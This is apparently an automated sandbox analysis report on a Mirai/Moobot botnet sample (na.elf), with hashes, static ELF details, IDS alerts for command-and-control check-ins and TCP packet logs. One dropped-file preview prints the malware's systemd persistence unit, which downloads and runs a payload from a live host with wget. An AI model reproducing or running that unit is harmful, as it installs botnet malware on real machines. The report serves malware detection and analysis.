	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMBAHTONcombahtonGmbHDE	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse	194.59.31.31
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.59.31.225

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	296
Entropy (8bit):	5.0752139838196015
Encrypted:	false
SSDEEP:	6:z80WuKyRZAMzdK+ann0RJ5R0qG2+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRdG2+GWRg+GWRuwjp+GWo
MD5:	EB5FC98B0D0D204A1CB963EBD192AEAF
SHA1:	3D70C62A728D5F8B8B9B438B754F467E825B1ED9
SHA-256:	FA2A136387978EC899EA6D4412E6593550A467534F022935C7B232482402374D
SHA-512:	92028A49B1C373A716F1AD6877296D0DDE4C83E625DC3DAFC375F349C836D81F7F8C0A427BF9FD7BD6D4C03FBBC8361A6FF72C7B1D2143932596CDF1E48F2EF5
Malicious:	false
Reputation:	low
Preview:	[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetsh4.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.iX82IG (deleted)

Download File

Process:	/tmp/na.elf
File Type:	data
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.8100810205217304
Encrypted:	false
SSDEEP:	3:TgBDlT1N:TgB11N
MD5:	2E8B62CD5B9D6203300E1A0F79554430
SHA1:	B6FC563BCA171C6DFA5A420C367F090C08635F4D
SHA-256:	54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
SHA-512:	81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
Malicious:	false
Reputation:	low
Preview:	/tmp/na.elf./tmp/nwlrbbmqbh

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.269781769889728
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	na.elf
File size:	125'284 bytes
MD5:	8a1de97bd5a302571f7cd7cd23ac8ad6
SHA1:	09304aa19c1ff458218098799e844f51e67f671c
SHA256:	8e05d02bfd535a557c2691defd2d30b8d7599e952a06247c7e44554fad54c25a
SHA512:	510647d6f8291fcac13a7a7616a429ae432f3caf4a9b027d697b2ccd5dbb97a1803a650582858ea2124a5e0054e9baffd191b97e2a92d9432ae1467ca0861e7c
SSDEEP:	1536:VaQwt2WOypOJl76R54UqQK0CLKQ0ytHEePVrNVm/W/Zbi9ghp5J1p:VnpKUlQuUpLQeePVrm/WRbi+5J1
TLSH:	99C35B77C8296EA8C654D674F0708F781F93A91581471FBE69A7C2B98043D8DF60A3F8
File Content Preview:	.ELF.....................@.4...........4. ...(...............@...@...........................B...B.LI..............Q.td............................././"O.n........#.@........#.*@.t...o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	124844
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x17500	0x0	0x6	AX	32
.fini	PROGBITS	0x4175e0	0x175e0	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x417604	0x17604	0x2814	0x0	0x2	A	4
.ctors	PROGBITS	0x429e1c	0x19e1c	0xc	0x0	0x3	WA	4
.dtors	PROGBITS	0x429e28	0x19e28	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x429e40	0x19e40	0x4914	0x0	0x3	WA	32
.got	PROGBITS	0x42e754	0x1e754	0x14	0x4	0x3	WA	4
.bss	NOBITS	0x42e768	0x1e768	0x86bc	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x1e768	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x19e18	0x19e18	6.9016	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x19e1c	0x429e1c	0x429e1c	0x494c	0xd008	0.4166	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T16:31:45.189681+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41608	91.200.103.117	23561	TCP
2024-10-07T16:31:53.036571+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41610	91.200.103.117	23561	TCP
2024-10-07T16:32:00.705827+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41612	91.200.103.117	23561	TCP
2024-10-07T16:32:10.330861+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41614	91.200.103.117	23561	TCP
2024-10-07T16:32:15.987943+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41616	91.200.103.117	23561	TCP
2024-10-07T16:32:24.610745+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41618	91.200.103.117	23561	TCP
2024-10-07T16:32:31.298035+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41620	91.200.103.117	23561	TCP
2024-10-07T16:32:42.946301+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41622	91.200.103.117	23561	TCP
2024-10-07T16:32:50.890356+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41624	91.200.103.117	23561	TCP
2024-10-07T16:32:59.891429+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41626	91.200.103.117	23561	TCP
2024-10-07T16:33:02.550490+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41628	91.200.103.117	23561	TCP
2024-10-07T16:33:12.194881+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41630	91.200.103.117	23561	TCP
2024-10-07T16:33:16.817515+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41632	91.200.103.117	23561	TCP
2024-10-07T16:33:27.443917+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41634	91.200.103.117	23561	TCP
2024-10-07T16:33:39.091874+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41636	91.200.103.117	23561	TCP
2024-10-07T16:33:50.745630+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41638	91.200.103.117	23561	TCP
2024-10-07T16:34:02.369016+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41640	91.200.103.117	23561	TCP
2024-10-07T16:34:06.661195+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41642	91.200.103.117	23561	TCP
2024-10-07T16:34:11.338918+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41644	91.200.103.117	23561	TCP
2024-10-07T16:34:16.859216+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41646	91.200.103.117	23561	TCP
2024-10-07T16:34:28.107543+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41648	91.200.103.117	23561	TCP
2024-10-07T16:34:35.957045+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41650	91.200.103.117	23561	TCP
2024-10-07T16:34:41.757202+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41652	91.200.103.117	23561	TCP
2024-10-07T16:34:50.505061+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41654	91.200.103.117	23561	TCP
2024-10-07T16:34:53.266633+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41656	91.200.103.117	23561	TCP
2024-10-07T16:35:00.092749+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41658	91.200.103.117	23561	TCP
2024-10-07T16:35:04.809191+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41660	91.200.103.117	23561	TCP
2024-10-07T16:35:13.498789+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41662	91.200.103.117	23561	TCP
2024-10-07T16:35:18.279983+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41664	91.200.103.117	23561	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:31:45.181525946 CEST	41608	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:45.186799049 CEST	23561	41608	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:45.186870098 CEST	41608	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:45.189681053 CEST	41608	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:45.194478035 CEST	23561	41608	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:46.794740915 CEST	23561	41608	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:46.795269012 CEST	41608	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:46.800431013 CEST	23561	41608	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:53.029423952 CEST	41610	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:53.034523964 CEST	23561	41610	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:53.034805059 CEST	41610	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:53.036571026 CEST	41610	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:53.041349888 CEST	23561	41610	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:54.675472975 CEST	23561	41610	91.200.103.117	192.168.2.15
Oct 7, 2024 16:31:54.677212954 CEST	41610	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:31:54.682040930 CEST	23561	41610	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:00.699976921 CEST	41612	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:00.705133915 CEST	23561	41612	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:00.705197096 CEST	41612	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:00.705826998 CEST	41612	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:00.711153030 CEST	23561	41612	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:02.313918114 CEST	23561	41612	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:02.314215899 CEST	41612	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:02.320907116 CEST	23561	41612	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:10.324544907 CEST	41614	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:10.329463959 CEST	23561	41614	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:10.329524994 CEST	41614	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:10.330861092 CEST	41614	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:10.335644960 CEST	23561	41614	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:11.972323895 CEST	23561	41614	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:11.972500086 CEST	41614	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:11.977684975 CEST	23561	41614	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:15.982069016 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:15.987072945 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:15.987194061 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:15.987942934 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:15.992755890 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:17.593966007 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:17.594177961 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:17.599338055 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:24.604713917 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:24.609690905 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:24.609755039 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:24.610744953 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:24.615717888 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:26.275882006 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:26.276077986 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:26.281907082 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:31.287163019 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:31.297270060 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:31.297353029 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:31.298034906 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:31.304357052 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:32.931293964 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:32.931432962 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:32.940673113 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:42.940751076 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:42.945559025 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:42.945616961 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:42.946300983 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:42.951118946 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:44.873644114 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:44.873807907 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:44.874315023 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:44.874357939 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:45.085206032 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:45.127347946 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:45.127449036 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:45.131001949 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:45.131087065 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:45.131160021 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:50.884111881 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:50.889061928 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:50.889158964 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:50.890356064 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:50.895167112 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:52.749303102 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:52.749470949 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:52.754477024 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:59.881634951 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:59.887689114 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:32:59.887761116 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:59.891428947 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:32:59.896300077 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:01.534236908 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:01.534450054 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:01.539321899 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:02.544827938 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:02.549709082 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:02.549772978 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:02.550489902 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:02.555404902 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:04.176995039 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:04.177237034 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:04.182574034 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:12.188164949 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:12.193116903 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:12.193324089 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:12.194880962 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:12.199763060 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:13.800381899 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:13.800607920 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:13.805635929 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:16.811295033 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:16.816179037 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:16.816260099 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:16.817514896 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:16.822407961 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:18.425873041 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:18.426032066 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:18.430854082 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:27.437891960 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:27.442786932 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:27.442867994 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:27.443917036 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:27.449095964 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:29.069991112 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:29.070182085 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:29.077950954 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:39.084094048 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:39.089207888 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:39.089452982 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:39.091873884 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:39.096784115 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:40.722799063 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:40.723407984 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:40.728193998 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:50.735011101 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:50.740048885 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:50.740206003 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:50.745630026 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:50.750498056 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:52.347522974 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:33:52.347703934 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:33:52.352502108 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:02.363337994 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:02.368298054 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:02.368365049 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:02.369015932 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:02.375842094 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:04.633889914 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:04.634062052 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:04.637595892 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:04.637701035 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:04.638375044 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:04.638454914 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:04.642400980 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:06.655287027 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:06.660365105 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:06.660465956 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:06.661195040 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:06.666322947 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:08.320200920 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:08.320385933 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:08.325597048 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:11.332539082 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:11.337392092 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:11.337450981 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:11.338917971 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:11.343791008 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:13.841047049 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:13.841272116 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:13.841372967 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:13.841435909 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:13.841794014 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:13.841840982 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:13.846302032 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:16.852857113 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:16.857881069 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:16.858153105 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:16.859215975 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:16.864068985 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:18.492832899 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:18.493100882 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:18.498022079 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:28.001591921 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:28.006896019 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:28.009445906 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:28.107542992 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:28.112396955 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:29.852464914 CEST	23561	41648	91.200.103.117	192.168.2.15
